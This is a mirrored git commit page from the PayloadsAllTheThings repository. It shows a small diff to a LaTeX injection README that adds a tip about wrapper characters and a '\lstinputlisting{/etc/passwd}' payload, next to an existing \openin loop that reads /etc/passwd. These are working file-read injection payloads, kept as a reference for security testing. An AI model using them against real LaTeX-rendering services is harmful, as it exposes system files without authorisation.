mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-18 09:25:26 +00:00
Update README.md
This commit is contained in:
parent
f723ef4878
commit
fa3cf25c55
@ -1,5 +1,7 @@
|
||||
# LaTex Injection
|
||||
|
||||
You might need to adjust injection with wrappers as `\[` or `$`.
|
||||
|
||||
## Read file
|
||||
|
||||
Read file and interpret the LaTeX code in it:
|
||||
@ -22,6 +24,7 @@ Read single lined file:
|
||||
Read multiple lined file:
|
||||
|
||||
```tex
|
||||
\lstinputlisting{/etc/passwd}
|
||||
\newread\file
|
||||
\openin\file=/etc/passwd
|
||||
\loop\unless\ifeof\file
|
||||
|
Loading…
Reference in New Issue
Block a user